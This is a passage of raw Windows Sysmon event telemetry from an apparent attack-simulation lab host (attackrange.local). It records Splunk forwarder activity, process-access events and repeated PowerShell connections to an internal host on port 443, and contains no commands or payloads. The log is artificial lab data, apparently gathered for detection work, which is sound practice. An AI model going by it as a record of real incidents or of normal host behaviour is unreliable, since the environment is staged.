15:02:00.229{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.229{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:00.229{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:01.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13A3C2CE2AC40FF81EFC9F27D7B5D1E6,SHA256=7143D9F4A6D9E7E310E3385C65259A88FC25D3B83A5A04207DC1160BBFE53FEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:02.428{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3320D47F95CF1FFFEDE4B280F03D22D1,SHA256=07A57EAF2EF68FF6B1ACB376F1BB4A6ABE8827B1DA18EE1048AE0FBD9A781E64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:27.068{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52484-false10.0.1.12-8000- 23542300x800000000000000035342928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:03.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6BEDCFFA87469877446263F5B78B2B36,SHA256=FE9F062A0E4CC92E100ACC0C753E356BAE65FFE408571FC0B52CB971E7918B88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:03.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FE07E1A87CB8F7EC51B064D9E22C045,SHA256=B90FD335DBE0DEDC89EC1BD98BA936955037CB040CB4261127E6D53159B73229,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.645{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-736C-613B-46B4-03000000C801}676C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.630{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.630{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.630{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.630{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.630{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-736C-613B-46B4-03000000C801}676C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.630{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-736C-613B-46B4-03000000C801}676C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.625{B81B27B7-736C-613B-46B4-03000000C801}676C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3758C2112417148B5A7A808E535D05A6,SHA256=21BD494635C170EB4971298A6C4ECE942E8D630D06A91E77B766FCE25711A8A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.262{B81B27B7-736C-613B-45B4-03000000C801}14004900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.046{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-736C-613B-45B4-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.030{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-736C-613B-45B4-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.030{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.030{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.030{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.030{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.030{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-736C-613B-45B4-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:04.025{B81B27B7-736C-613B-45B4-03000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:05.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=942A7DFA600BC0E7364FD1E9B82F6412,SHA256=475F6F0412000938770960AE86DDCAED51A1CB6022F6335F6C1DBD07F3B96941,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:29.750{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52485-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:05.061{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C65B1DB2CAB070177B00FBBAC5590EE0,SHA256=DB6D077AAC9F8E1A810489DCAD8F0198C741D70A1E14A8EB70B49444FB008582,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:05.061{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A2C352A333E3D9907D926312F993D37,SHA256=7E67BE54C4472E385F6192AAEA4D43E4AA69BE3EC8C9212B75A38F877985BD91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:06.491{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9D9A1567832E2C7B09CC4D410A8AD9,SHA256=D943F93EDAED68BE3A31FC9BB29C213F8B2E898D755EBDEABC97B46355B7AE53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:07.491{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C0FB573AAE959CDF9AECBA2A682F886,SHA256=12B0C4E3B4318B30D4FF6FE194B72838C0BCCCE81829132053D7D05E025836DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.078{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52486-false10.0.1.12-8000- 23542300x800000000000000035342955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:08.905{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=638BA81077A7BA40A8D173348EB31EE6,SHA256=2DE24ADF07BB97748F5C200D078AD55CC820B6C9774D6C34B55FB64F4D8F0C89,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:08.506{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=297DC10FF2A62C4E4A1860428297F566,SHA256=25FD942519E77B5649EE7A7FD8DC7836CE2BE4C3AC79AB72CFFC7E48DD6F36B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:34.779{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52487-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:09.522{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 